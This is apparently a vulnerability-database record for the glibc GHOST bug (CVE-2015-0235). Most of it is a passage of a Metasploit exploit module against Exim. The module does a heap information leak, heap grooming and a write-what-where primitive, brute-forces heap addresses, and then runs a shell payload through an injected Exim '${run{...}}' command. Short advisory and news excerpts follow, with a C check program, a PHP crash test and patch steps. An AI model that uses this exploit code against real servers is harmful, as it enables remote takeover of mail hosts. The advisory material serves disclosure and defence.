not yet given\"\n\n # try a few more offsets (allows us to double-check things,\n # and distinguish between 32-bit and 64-bit machines)\n\n error = [error]\n 1.upto(5) do |i|\n error[i] = try_information_leak(heap_shift, write_offset + i*8)\n throw(:another_heap_shift) if not error[i]\n end\n vprint_status(\"#{{ error: error }}\")\n\n _leaked_arch = leaked_arch\n if (error[0] == error[1]) and (error[0].empty? or (error[0].unpack('C')[0] & 7) == 0) and # fd_nextsize\n (error[2] == error[3]) and (error[2].empty? or (error[2].unpack('C')[0] & 7) == 0) and # fd\n (error[4] =~ /\\A503 send[^e].?\\z/mn) and ((error[4].unpack('C*')[8] & 15) == PREV_INUSE) and # size\n (error[5] == \"177\") # the last \\x7F of our BAD1 command, encoded as \\\\177 by string_printing()\n leaked_arch = ARCH_X64\n\n elsif (error[0].empty? or (error[0].unpack('C')[0] & 3) == 0) and # fd_nextsize\n (error[1].empty? 
or (error[1].unpack('C')[0] & 3) == 0) and # fd\n (error[2] =~ /\\A503 [^s].?\\z/mn) and ((error[2].unpack('C*')[4] & 7) == PREV_INUSE) and # size\n (error[3] == \"177\") # the last \\x7F of our BAD1 command, encoded as \\\\177 by string_printing()\n leaked_arch = ARCH_X86\n\n else\n throw(:another_heap_shift)\n end\n vprint_status(\"#{{ leaked_arch: leaked_arch }}\")\n fail_with(Failure::BadConfig, \"arch changed\") if _leaked_arch and _leaked_arch != leaked_arch\n\n # try different large-bins: most of them should be empty,\n # so keep the most frequent fd_nextsize address\n # (a pointer to the malloc_chunk itself)\n\n count = Hash.new(0)\n 0.upto(9) do |last_digit|\n error = try_information_leak(heap_shift, write_offset, last_digit)\n next if not error or error.length < 2 # heap_shift can fix the 2 least significant NUL bytes\n next if (error.unpack('C')[0] & (leaked_arch == ARCH_X86 ? 7 : 15)) != 0 # MALLOC_ALIGN_MASK\n count[error] += 1\n end\n vprint_status(\"#{{ count: count }}\")\n throw(:another_heap_shift) if count.empty?\n\n # convert count to a nested array of [key, value] arrays and sort it\n error_count = count.sort { |a, b| b[1] <=> a[1] }\n error_count = error_count.first # most frequent\n error = error_count[0]\n count = error_count[1]\n throw(:another_heap_shift) unless count >= 6 # majority\n leaked_addr.push({ error: error, shift: heap_shift })\n\n # common-case shortcut\n if (leaked_arch == ARCH_X86 and error[0,4] == error[4,4] and error[8..-1] == \"er not yet given\") or\n (leaked_arch == ARCH_X64 and error.length == 6 and error[5].count(\"\\x7E-\\x7F\").nonzero?)\n leaked_addr = [leaked_addr.last] # use this one, and not another\n throw(:another_heap_shift, true) # done\n end\n throw(:another_heap_shift)\n end\n throw(:another_heap_shift)\n end\n break if done\n end\n\n fail_with(Failure::NotVulnerable, \"not vuln? old glibc? (no leaked_arch)\") if leaked_arch.nil?\n fail_with(Failure::NotVulnerable, \"NUL, CR, LF in addr? 
(no leaked_addr)\") if leaked_addr.empty?\n\n leaked_addr.sort! { |a, b| b[:error].length <=> a[:error].length }\n leaked_addr = leaked_addr.first # longest\n error = leaked_addr[:error]\n shift = leaked_addr[:shift]\n\n leaked_addr = 0\n (leaked_arch == ARCH_X86 ? 4 : 8).times do |i|\n break if i >= error.length\n leaked_addr += error.unpack('C*')[i] * (2**(i*8))\n end\n # leaked_addr should point to the beginning of Exim's smtp_cmd_buffer:\n leaked_addr -= 2*SMTP_CMD_BUFFER_SIZE + IN_BUFFER_SIZE + 4*(11*1024+shift) + 3*1024 + STORE_BLOCK_SIZE\n fail_with(Failure::NoTarget, \"NUL, CR, LF in addr? (no leaked_addr)\") if leaked_addr <= MMAP_MIN_ADDR\n\n print_good(\"Successfully leaked_arch: #{leaked_arch}\")\n print_good(\"Successfully leaked_addr: #{leaked_addr.to_s(16)}\")\n @leaked = { arch: leaked_arch, addr: leaked_addr }\n end\n\n def try_information_leak(heap_shift, write_offset, last_digit = 9)\n fail_with(Failure::BadConfig, \"heap_shift\") if (heap_shift < MIN_HEAP_SHIFT)\n fail_with(Failure::BadConfig, \"heap_shift\") if (heap_shift & 15) != 0\n fail_with(Failure::BadConfig, \"write_offset\") if (write_offset & 7) != 0\n fail_with(Failure::BadConfig, \"last_digit\") if \"#{last_digit}\" !~ /\\A[0-9]\\z/\n\n smtp_connect\n\n # bulletproof Heap Feng Shui; the hard part is avoiding:\n # \"Too many syntax or protocol errors\" (3)\n # \"Too many unrecognized commands\" (3)\n # \"Too many nonmail commands\" (10)\n\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 11*1024+13-1 + heap_shift)\n smtp_recv(250)\n\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 3*1024+13-1)\n smtp_recv(250)\n\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 3*1024+16+13-1)\n smtp_recv(250)\n\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 8*1024+16+13-1)\n smtp_recv(250)\n\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 5*1024+16+13-1)\n smtp_recv(250)\n\n # overflow (3 bytes) gethostbyname's buffer, and\n # 
overwrite its next_chunk's size field with 0x003?31\n # ^ last_digit\n smtp_send(\"HELO \", \"\", \"0\", \".1#{last_digit}\", \"\", 12*1024+3-1 + heap_shift-MIN_HEAP_SHIFT)\n begin # ^ 0x30 | PREV_INUSE\n smtp_recv(HELO_CODES)\n\n smtp_send(\"RSET\")\n smtp_recv(250)\n\n smtp_send(\"RCPT TO:\", \"\", method(:rand_text_alpha), \"\\x7F\", \"\", 15*1024)\n smtp_recv(503, 'sender not yet given')\n\n smtp_send(\"\", \"BAD1 \", method(:rand_text_alpha), \"\\x7F\\x7F\\x7F\\x7F\", \"\", 10*1024-16-1 + write_offset)\n smtp_recv(500, '\\A500 unrecognized command\\r\\n\\z')\n\n smtp_send(\"BAD2 \", \"\", method(:rand_text_alpha), \"\\x7F\", \"\", 15*1024)\n smtp_recv(500, '\\A500 unrecognized command\\r\\n\\z')\n\n smtp_send(\"DATA\")\n reply = smtp_recv(503)\n\n lines = reply[:lines]\n fail if lines.size <= 3\n fail if lines[+0] != \"503-All RCPT commands were rejected with this error:\\r\\n\"\n fail if lines[-2] != \"503-valid RCPT command must precede DATA\\r\\n\"\n fail if lines[-1] != \"503 Too many syntax or protocol errors\\r\\n\"\n\n # if leaked_addr contains LF, reverse smtp_respond()'s multiline splitting\n # (the \"while (isspace(*msg)) msg++;\" loop can't be easily reversed,\n # but happens with lower probability)\n\n error = lines[+1..-3].join(\"\")\n error.sub!(/\\A503-/mn, \"\")\n error.sub!(/\\r\\n\\z/mn, \"\")\n error.gsub!(/\\r\\n503-/mn, \"\\n\")\n return error\n\n rescue\n return nil\n end\n\n ensure\n smtp_disconnect\n end\n\n def code_execution\n print_status(\"Trying code execution...\")\n\n # can't \"${run{/bin/sh -c 'exec /bin/sh -i <&#{b} >&0 2>&0'}} \" anymore:\n # DW/26 Set FD_CLOEXEC on SMTP sockets after forking in the daemon, to ensure\n # that rogue child processes cannot use them.\n\n fail_with(Failure::BadConfig, \"encoded payload\") if payload.raw != payload.encoded\n fail_with(Failure::BadConfig, \"invalid payload\") if payload.raw.empty? 
or payload.raw.count(\"^\\x20-\\x7E\").nonzero?\n # Exim processes our run-ACL with expand_string() first (hence the [\\$\\{\\}\\\\] escapes),\n # and transport_set_up_command(), string_dequote() next (hence the [\\\"\\\\] escapes).\n encoded = payload.raw.gsub(/[\\\"\\\\]/, '\\\\\\\\\\\\&').gsub(/[\\$\\{\\}\\\\]/, '\\\\\\\\\\\\&')\n # setsid because of Exim's \"killpg(pid, SIGKILL);\" after \"alarm(60);\"\n command = '${run{/usr/bin/env setsid /bin/sh -c \"' + encoded + '\"}}'\n vprint_status(\"Command: #{command}\")\n\n # don't try to execute commands directly, try a very simple ACL first,\n # to distinguish between exploitation-problems and shellcode-problems\n\n acldrop = \"drop message=\"\n message = rand_text_alpha(command.length - acldrop.length)\n acldrop += message\n\n max_rand_offset = (@leaked[:arch] == ARCH_X86 ? 32 : 64)\n max_heap_addr = @leaked[:addr]\n min_heap_addr = nil\n survived = nil\n\n # we later fill log_buffer and big_buffer with alpha chars,\n # which creates a safe-zone at the beginning of the heap,\n # where we can't possibly crash during our brute-force\n\n # 4, because 3 copies of sender_helo_name, and step_len;\n # start big, but refine little by little in case\n # we crash because we overwrite important data\n\n helo_len = (LOG_BUFFER_SIZE + BIG_BUFFER_SIZE) / 4\n loop do\n\n sender_helo_name = \"A\" * helo_len\n address = sprintf(\"[%s]:%d\", @sender[:hostaddr], 65535)\n\n # the 3 copies of sender_helo_name, allocated by\n # host_build_sender_fullhost() in POOL_PERM memory\n\n helo_ip_size = ALIGNMENT +\n sender_helo_name[+1..-2].length\n\n sender_fullhost_size = ALIGNMENT +\n sprintf(\"%s (%s) %s\", @sender[:hostname], sender_helo_name, address).length\n\n sender_rcvhost_size = ALIGNMENT + ((@sender[:ident] == nil) ?\n sprintf(\"%s (%s helo=%s)\", @sender[:hostname], address, sender_helo_name) :\n sprintf(\"%s\\n\\t(%s helo=%s ident=%s)\", @sender[:hostname], address, sender_helo_name, @sender[:ident])\n ).length\n\n # fit 
completely into the safe-zone\n step_len = (LOG_BUFFER_SIZE + BIG_BUFFER_SIZE) -\n (max_rand_offset + helo_ip_size + sender_fullhost_size + sender_rcvhost_size)\n loop do\n\n # inside smtp_cmd_buffer (we later fill smtp_cmd_buffer and smtp_data_buffer\n # with alpha chars, which creates another safe-zone at the end of the heap)\n heap_addr = max_heap_addr\n loop do\n\n # try harder the first time around: we obtain better\n # heap boundaries, and we usually hit our ACL faster\n\n (min_heap_addr ? 1 : 2).times do\n\n # try the same heap_addr several times, but with different random offsets,\n # in case we crash because our hijacked storeblock's length field is too small\n # (we don't control what's stored at heap_addr)\n\n rand_offset = rand(max_rand_offset)\n vprint_status(\"#{{ helo: helo_len, step: step_len, addr: heap_addr.to_s(16), offset: rand_offset }}\")\n reply = try_code_execution(helo_len, acldrop, heap_addr + rand_offset)\n vprint_status(\"#{{ reply: reply }}\") if reply\n\n if reply and\n reply[:code] == \"550\" and\n # detect the parsed ACL, not the \"still in text form\" ACL (with \"=\")\n reply[:lines].join(\"\").delete(\"^=A-Za-z\") =~ /(\\A|[^=])#{message}/mn\n print_good(\"Brute-force SUCCESS\")\n print_good(\"Please wait for reply...\")\n # execute command this time, not acldrop\n reply = try_code_execution(helo_len, command, heap_addr + rand_offset)\n vprint_status(\"#{{ reply: reply }}\")\n return handler\n end\n\n if not min_heap_addr\n if reply\n fail_with(Failure::BadConfig, \"no min_heap_addr\") if (max_heap_addr - heap_addr) >= MAX_HEAP_SIZE\n survived = heap_addr\n else\n if ((survived ? 
survived : max_heap_addr) - heap_addr) >= MIN_HEAP_SIZE\n # survived should point to our safe-zone at the beginning of the heap\n fail_with(Failure::UnexpectedReply, \"never survived\") if not survived\n print_good \"Brute-forced min_heap_addr: #{survived.to_s(16)}\"\n min_heap_addr = survived\n end\n end\n end\n end\n\n heap_addr -= step_len\n break if min_heap_addr and heap_addr < min_heap_addr\n end\n\n break if step_len < 1024\n step_len /= 2\n end\n\n helo_len /= 2\n break if helo_len < 1024\n # ^ otherwise the 3 copies of sender_helo_name will\n # fit into the current_block of POOL_PERM memory\n end\n fail_with(Failure::UnexpectedReply, \"Brute-force FAILURE\")\n end\n\n # our write-what-where primitive\n def try_code_execution(len, what, where)\n fail_with(Failure::UnexpectedReply, \"#{what.length} >= #{len}\") if what.length >= len\n fail_with(Failure::UnexpectedReply, \"#{where} < 0\") if where < 0\n\n x86 = (@leaked[:arch] == ARCH_X86)\n min_heap_shift = (x86 ? 512 : 768) # at least request2size(sizeof(FILE))\n heap_shift = min_heap_shift + rand(1024 - min_heap_shift)\n last_digit = 1 + rand(9)\n\n smtp_connect\n\n # fill smtp_cmd_buffer, smtp_data_buffer, and big_buffer with alpha chars\n smtp_send(\"MAIL FROM:\", \"\", method(:rand_text_alpha), \"<#{rand_text_alpha_upper(8)}>\", \"\", BIG_BUFFER_SIZE -\n \"501 : sender address must contain a domain\\r\\n\\0\".length)\n smtp_recv(501, 'sender address must contain a domain')\n\n smtp_send(\"RSET\")\n smtp_recv(250)\n\n # bulletproof Heap Feng Shui; the hard part is avoiding:\n # \"Too many syntax or protocol errors\" (3)\n # \"Too many unrecognized commands\" (3)\n # \"Too many nonmail commands\" (10)\n\n # / 5, because \"\\x7F\" is non-print, and:\n # ss = store_get(length + nonprintcount * 4 + 1);\n smtp_send(\"BAD1 \", \"\", \"\\x7F\", \"\", \"\", (19*1024 + heap_shift) / 5)\n smtp_recv(500, '\\A500 unrecognized command\\r\\n\\z')\n\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 
5*1024+13-1)\n smtp_recv(250)\n\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 3*1024+13-1)\n smtp_recv(250)\n\n smtp_send(\"BAD2 \", \"\", \"\\x7F\", \"\", \"\", (13*1024 + 128) / 5)\n smtp_recv(500, '\\A500 unrecognized command\\r\\n\\z')\n\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 3*1024+16+13-1)\n smtp_recv(250)\n\n # overflow (3 bytes) gethostbyname's buffer, and\n # overwrite its next_chunk's size field with 0x003?31\n # ^ last_digit\n smtp_send(\"EHLO \", \"\", \"0\", \".1#{last_digit}\", \"\", 5*1024+64+3-1)\n smtp_recv(HELO_CODES) # ^ 0x30 | PREV_INUSE\n\n # auth_xtextdecode() is the only way to overwrite the beginning of a\n # current_block of memory (the \"storeblock\" structure) with arbitrary data\n # (so that our hijacked \"next\" pointer can contain NUL, CR, LF characters).\n # this shapes the rest of our exploit: we overwrite the beginning of the\n # current_block of POOL_PERM memory with the current_block of POOL_MAIN\n # memory (allocated by auth_xtextdecode()).\n\n auth_prefix = rand_text_alpha(x86 ? 11264 : 11280)\n (x86 ? 
4 : 8).times { |i| auth_prefix += sprintf(\"+%02x\", (where >> (i*8)) & 255) }\n auth_prefix += \".\"\n\n # also fill log_buffer with alpha chars\n smtp_send(\"MAIL FROM:<> AUTH=\", auth_prefix, method(:rand_text_alpha), \"+\", \"\", 0x3030)\n smtp_recv(501, 'invalid data for AUTH')\n\n smtp_send(\"HELO \", \"[1:2:3:4:5:6:7:8%eth0:\", \" \", \"#{what}]\", \"\", len)\n begin\n reply = smtp_recv(ANY_CODE)\n return reply if reply[:code] !~ /#{HELO_CODES}/\n return reply if reply[:code] != \"250\" and reply[:lines].first !~ /argument does not match calling host/\n\n smtp_send(\"MAIL FROM:<>\")\n reply = smtp_recv(ANY_CODE)\n return reply if reply[:code] != \"250\"\n\n smtp_send(\"RCPT TO:<postmaster>\")\n reply = smtp_recv\n return reply\n\n rescue\n return nil\n end\n\n ensure\n smtp_disconnect\n end\n\n DIGITS = '([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])'\n DOT = '[.]'\n\n def smtp_connect(exploiting = true)\n fail_with(Failure::Unknown, \"sock isn't nil\") if sock\n\n connect\n fail_with(Failure::Unknown, \"sock is nil\") if not sock\n @smtp_state = :recv\n\n # Receiving the banner (but we don't really need to check it)\n smtp_recv(220)\n return if not exploiting\n\n sender_host_address = datastore['SENDER_HOST_ADDRESS']\n if sender_host_address !~ /\\A#{DIGITS}#{DOT}#{DIGITS}#{DOT}#{DIGITS}#{DOT}#{DIGITS}\\z/\n fail_with(Failure::BadConfig, \"bad SENDER_HOST_ADDRESS (nil)\") if sender_host_address.nil?\n fail_with(Failure::BadConfig, \"bad SENDER_HOST_ADDRESS (not in IPv4 dotted-decimal notation)\")\n end\n sender_host_address_octal = \"0\" + $1.to_i.to_s(8) + \".#{$2}.#{$3}.#{$4}\"\n\n # turn helo_seen on (enable the MAIL command)\n # call smtp_verify_helo() (force fopen() and small malloc()s)\n # call host_find_byname() (force gethostbyname's initial 1024-byte malloc())\n smtp_send(\"HELO #{sender_host_address_octal}\")\n reply = smtp_recv(HELO_CODES)\n\n if reply[:code] != \"250\"\n fail_with(Failure::NoTarget, \"not Exim?\") if reply[:lines].first !~ 
/argument does not match calling host/\n fail_with(Failure::BadConfig, \"bad SENDER_HOST_ADDRESS (helo_verify_hosts)\")\n end\n\n if reply[:lines].first =~ /\\A250 (\\S*) Hello (.*) \\[(\\S*)\\]\\r\\n\\z/mn\n fail_with(Failure::BadConfig, \"bad SENDER_HOST_ADDRESS (helo_try_verify_hosts)\") if sender_host_address != $3\n smtp_active_hostname = $1\n sender_host_name = $2\n\n if sender_host_name =~ /\\A(.*) at (\\S*)\\z/mn\n sender_host_name = $2\n sender_ident = $1\n else\n sender_ident = nil\n end\n fail_with(Failure::BadConfig, \"bad SENDER_HOST_ADDRESS (no FCrDNS)\") if sender_host_name == sender_host_address_octal\n\n else\n # can't double-check sender_host_address here, so only for advanced users\n fail_with(Failure::BadConfig, \"user-supplied EHLO greeting\") unless datastore['FORCE_EXPLOIT']\n # worst-case scenario\n smtp_active_hostname = \"A\" * NS_MAXDNAME\n sender_host_name = \"A\" * NS_MAXDNAME\n sender_ident = \"A\" * 127 * 4 # sender_ident = string_printing(string_copyn(p, 127));\n end\n\n _sender = @sender\n @sender = {\n hostaddr: sender_host_address,\n hostaddr8: sender_host_address_octal,\n hostname: sender_host_name,\n ident: sender_ident,\n __smtp_active_hostname: smtp_active_hostname\n }\n fail_with(Failure::BadConfig, \"sender changed\") if _sender and _sender != @sender\n\n # avoid a future pathological case by forcing it now:\n # \"Do NOT free the first successor, if our current block has less than 256 bytes left.\"\n smtp_send(\"MAIL FROM:\", \"<\", method(:rand_text_alpha), \">\", \"\", STOREPOOL_MIN_SIZE + 16)\n smtp_recv(501, 'sender address must contain a domain')\n\n smtp_send(\"RSET\")\n smtp_recv(250, 'Reset OK')\n end\n\n def smtp_send(prefix, arg_prefix = nil, arg_pattern = nil, arg_suffix = nil, suffix = nil, arg_length = nil)\n fail_with(Failure::BadConfig, \"state is #{@smtp_state}\") if @smtp_state != :send\n @smtp_state = :sending\n\n if not arg_pattern\n fail_with(Failure::BadConfig, \"prefix is nil\") if not prefix\n 
fail_with(Failure::BadConfig, \"param isn't nil\") if arg_prefix or arg_suffix or suffix or arg_length\n command = prefix\n\n else\n fail_with(Failure::BadConfig, \"param is nil\") unless prefix and arg_prefix and arg_suffix and suffix and arg_length\n length = arg_length - arg_prefix.length - arg_suffix.length\n fail_with(Failure::BadConfig, \"smtp_send\", \"len is #{length}\") if length <= 0\n argument = arg_prefix\n case arg_pattern\n when String\n argument += arg_pattern * (length / arg_pattern.length)\n argument += arg_pattern[0, length % arg_pattern.length]\n when Method\n argument += arg_pattern.call(length)\n end\n argument += arg_suffix\n fail_with(Failure::BadConfig, \"arglen is #{argument.length}, not #{arg_length}\") if argument.length != arg_length\n command = prefix + argument + suffix\n end\n\n fail_with(Failure::BadConfig, \"invalid char in cmd\") if command.count(\"^\\x20-\\x7F\") > 0\n fail_with(Failure::BadConfig, \"cmdlen is #{command.length}\") if command.length > SMTP_CMD_BUFFER_SIZE\n command += \"\\n\" # RFC says CRLF, but squeeze as many chars as possible in smtp_cmd_buffer\n\n # the following loop works around a bug in the put() method:\n # \"while (send_idx < send_len)\" should be \"while (send_idx < buf.length)\"\n # (or send_idx and/or send_len could be removed altogether, like here)\n\n while command and not command.empty?\n num_sent = sock.put(command)\n fail_with(Failure::BadConfig, \"sent is #{num_sent}\") if num_sent <= 0\n fail_with(Failure::BadConfig, \"sent is #{num_sent}, greater than #{command.length}\") if num_sent > command.length\n command = command[num_sent..-1]\n end\n\n @smtp_state = :recv\n end\n\n def smtp_recv(expected_code = nil, expected_data = nil)\n fail_with(Failure::BadConfig, \"state is #{@smtp_state}\") if @smtp_state != :recv\n @smtp_state = :recving\n\n failure = catch(:failure) do\n\n # parse SMTP replies very carefully (the information\n # leak injects arbitrary data into multiline replies)\n\n data = 
\"\"\n while data !~ /(\\A|\\r\\n)[0-9]{3}[ ].*\\r\\n\\z/mn\n begin\n more_data = sock.get_once\n rescue\n throw(:failure, \"Caught #{$!.class}: #{$!.message}\")\n end\n throw(:failure, \"no more data\") if more_data.nil?\n throw(:failure, \"no more data\") if more_data.empty?\n data += more_data\n end\n\n throw(:failure, \"malformed reply (count)\") if data.count(\"\\0\") > 0\n lines = data.scan(/(?:\\A|\\r\\n)[0-9]{3}[ -].*?(?=\\r\\n(?=[0-9]{3}[ -]|\\z))/mn)\n throw(:failure, \"malformed reply (empty)\") if lines.empty?\n\n code = nil\n lines.size.times do |i|\n lines[i].sub!(/\\A\\r\\n/mn, \"\")\n lines[i] += \"\\r\\n\"\n\n if i == 0\n code = lines[i][0,3]\n throw(:failure, \"bad code\") if code !~ /\\A[0-9]{3}\\z/mn\n if expected_code and code !~ /\\A(#{expected_code})\\z/mn\n throw(:failure, \"unexpected #{code}, expected #{expected_code}\")\n end\n end\n\n line_begins_with = lines[i][0,4]\n line_should_begin_with = code + (i == lines.size-1 ? \" \" : \"-\")\n\n if line_begins_with != line_should_begin_with\n throw(:failure, \"line begins with #{line_begins_with}, \" \\\n \"should begin with #{line_should_begin_with}\")\n end\n end\n\n throw(:failure, \"malformed reply (join)\") if lines.join(\"\") != data\n if expected_data and data !~ /#{expected_data}/mn\n throw(:failure, \"unexpected data\")\n end\n\n reply = { code: code, lines: lines }\n @smtp_state = :send\n return reply\n end\n\n fail_with(Failure::UnexpectedReply, \"#{failure}\") if expected_code\n return nil\n end\n\n def smtp_disconnect\n disconnect if sock\n fail_with(Failure::Unknown, \"sock isn't nil\") if sock\n @smtp_state = :disconnected\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/smtp/exim_gethostbyname_bof.rb"}], "seebug": [{"lastseen": "2017-11-19T12:32:32", "bulletinFamily": "exploit", "description": 
"<p>Recently, security researchers abroad disclosed a serious security issue found in the Linux glibc library. It can allow an attacker to gain control of the operating system locally or remotely. It is numbered #CVE-2015-0235# and named the GHOST vulnerability.</p><p>What is GHOST? Why is it named GHOST?</p><p>The vulnerability dates back to:</p><p>The first vulnerable version of the GNU C Library is glibc-2.2, released on November 10, 2000.</p><p>\u201cDuring a code audit performed internally at Qualys, we discovered a buffer overflow in</p><p>the __nss_hostname_digits_dots() function of the GNU C Library (glibc).</p><p>This bug is reachable both locally and remotely via the gethostbyname*() functions, so we decided to analyze it<br>and its impact thoroughly, and named this vulnerability \"GHOST\".\u201d</p><p>The gist of the quoted passage: \u201cthe vulnerability is in the GNU C library (glibc); the affected functions are gethostbyname*(), hence the name GHOST\u201d</p><p><strong>What is glibc</strong></p><p>glibc is the libc library released by GNU, i.e. the C runtime library. glibc is the lowest-level API in a Linux system; almost every other runtime library depends on glibc. Besides wrapping the system services provided by the Linux operating system, glibc itself also implements many other necessary services. glibc covers almost all of the standards common to UNIX.</p><p><strong>Vulnerability impact:</strong></p><p>Both local and remote use are affected; it can allow an attacker to gain control of the operating system locally or remotely.</p><p><strong>Affected versions:</strong></p><p>Versions between glibc-2.2 and glibc-2.17</p><p>glibc 2.18 (released August 12, 2013) already contains the fix (patch released May 21, 2013)</p><p><strong>Affected platforms:</strong></p><p><strong> <img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/1.28%E9%85%8D%E5%9B%BE1.jpg\" alt=\"1.28 figure 1\" width=\"580\" height=\"612\"></strong></p><p><strong>In response, the Knownsec security research team investigated immediately and published partial remediation steps:</strong></p><p><strong>Ubuntu 12.04 fix:</strong></p><p>Add the official security update sources to /etc/apt/sources.list:</p><p>deb <a href=\"http://security.ubuntu.com/ubuntu\" rel=\"nofollow\">http://security.ubuntu.com/ubuntu</a> precise-security main restricted</p><p>deb-src <a href=\"http://security.ubuntu.com/ubuntu\" rel=\"nofollow\">http://security.ubuntu.com/ubuntu</a> precise-security main restricted</p><p>deb <a href=\"http://security.ubuntu.com/ubuntu\" rel=\"nofollow\">http://security.ubuntu.com/ubuntu</a> precise-security universe</p><p>deb-src <a href=\"http://security.ubuntu.com/ubuntu\" rel=\"nofollow\">http://security.ubuntu.com/ubuntu</a> precise-security universe</p><p>deb <a href=\"http://security.ubuntu.com/ubuntu\" rel=\"nofollow\">http://security.ubuntu.com/ubuntu</a> precise-security multiverse</p><p>deb-src <a href=\"http://security.ubuntu.com/ubuntu\" rel=\"nofollow\">http://security.ubuntu.com/ubuntu</a> precise-security multiverse</p><p>Then run:</p><p>$ sudo apt-get update</p><p>$ sudo apt-get upgrade</p><p><strong>CentOS 6/7:</strong></p><p>Use the official repositories, then run:</p><p># yum clean all && yum update</p><p> </p><p><strong>References:</strong></p><ul><li><a href=\"http://www.openwall.com/lists/oss-security/2015/01/27/9\">http://www.openwall.com/lists/oss-security/2015/01/27/9</a></li><li><a href=\"http://d.hatena.ne.jp/Kango/20150128/1422409960\">http://d.hatena.ne.jp/Kango/20150128/1422409960</a></li></ul>", "modified": "2015-07-02T00:00:00", "published": "2015-07-02T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-89237", "id": "SSV:89237", "type": "seebug", "title": "Linux glibc buffer overflow\n (GHOST)", "sourceData": "\n #include <netdb.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <errno.h>\n \n#define CANARY \"in_the_coal_mine\"\n \nstruct {\n char buffer[1024];\n char canary[sizeof(CANARY)];\n} temp = { \"buffer\", CANARY };\n \nint main(void) {\n struct hostent resbuf;\n struct hostent *result;\n int herrno;\n int retval;\n \n /*** strlen (name) = size_needed - sizeof (*host_addr) - sizeof (*h_addr_ptrs) - 1; ***/\n size_t len = sizeof(temp.buffer) - 16*sizeof(unsigned char) - 2*sizeof(char *) - 1;\n char name[sizeof(temp.buffer)];\n memset(name, '0', len);\n name[len] = '\\0';\n \n retval = gethostbyname_r(name, &resbuf, temp.buffer, sizeof(temp.buffer), &result, &herrno);\n \n if (strcmp(temp.canary, CANARY) != 0) {\n puts(\"vulnerable\");\n exit(EXIT_SUCCESS);\n }\n if (retval == ERANGE) {\n puts(\"not vulnerable\");\n exit(EXIT_SUCCESS);\n }\n puts(\"should not happen\");\n exit(EXIT_FAILURE);\n}\n/* from http://www.openwall.com/lists/oss-security/2015/01/27/9 */\n ", "cvss": {"score": 10.0, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-89237"}], "thn": [{"lastseen": "2018-01-27T09:17:33", "bulletinFamily": "info", "description": "After the disclosure of the extremely critical **[GHOST vulnerability](<https://thehackernews.com/2015/01/ghost-linux-security-vulnerability27.html>) in the GNU C library (glibc)**, a widely used component of most Linux distributions, security researchers have discovered that PHP applications, including the **[WordPress](<https://thehackernews.com/search/label/WordPress>)** Content Management System (CMS), could also be affected by the bug.\n\n\"**GHOST**\" is a serious vulnerability (_CVE-2015-0235_), announced this week by researchers at the California-based security firm Qualys, that involves a heap-based buffer overflow in the glibc function \"GetHOSTbyname()\". Researchers said the vulnerability has been present in the glibc code since 2000.\n\nThough the major Linux distributors such as **Red Hat**, **Debian** and **Ubuntu** have already updated their software against the flaw, GHOST could currently be used by hackers against only a handful of applications to remotely run executable code and silently gain control of a Linux server.\n\nAs we explained in our previous article, the heap-based buffer overflow was found in the __nss_hostname_digits_dots() function, which is used by the **gethostbyname()** and **gethostbyname2()** glibc function calls. 
\n\nSince PHP applications, including WordPress, also use the **gethostbyname() function wrapper**, the risk from the critical vulnerability is higher even after many Linux distributions have issued fixes.\n\n**GHOST - BIG ISSUE FOR WORDPRESS**\n\nAccording to Sucuri researcher Marc-Alexandre Montpas, the GHOST vulnerability could be a big issue for the WordPress CMS, as it uses the **wp_http_validate_url()** function to validate every pingback post URL.\n\n> \"_...And it does so by using gethostbyname(),_\" wrote Montpas in an [advisory](<http://blog.sucuri.net/2015/01/critical-ghost-vulnerability-released.html>) published Wednesday. \"_So an attacker could leverage this vector to insert a malicious URL that would trigger a buffer overflow bug, server-side, potentially allowing him to gain privileges on the server._\"\n\nThe vulnerability affects all versions of glibc up to and including glibc-2.17. It was patched in glibc-2.18 in May 2013, but it was not marked as a security vulnerability, so the fix did not make it into many common Linux distributions like Red Hat and Ubuntu.\n\n**HOW TO CHECK YOUR SYSTEM AGAINST THE GHOST FLAW**\n\n> _\"This is a very critical vulnerability and should be treated as such,\"_ Montpas said. _\"If you have a dedicated server (or VPS) running Linux, you have to make sure you update it right away.\"_\n\nSucuri also provided the following PHP test command, which an admin can run in a terminal on their server. If it ends with a segmentation fault, the Linux server is vulnerable to GHOST.\n\n> _php -r '$e=\"0\";for($i=0;$i<2500;$i++){$e=\"0$e\";} gethostbyname($e);'_\n>\n> _Segmentation fault_\n\n**HOW TO PROTECT**\n\nSo far, Debian 7, Red Hat Enterprise Linux 6 and 7, CentOS 6 and 7 and Ubuntu 12.04 have released software updates. Users of the above Linux distributions are advised to patch their systems, followed by a system reboot, as soon as possible. 
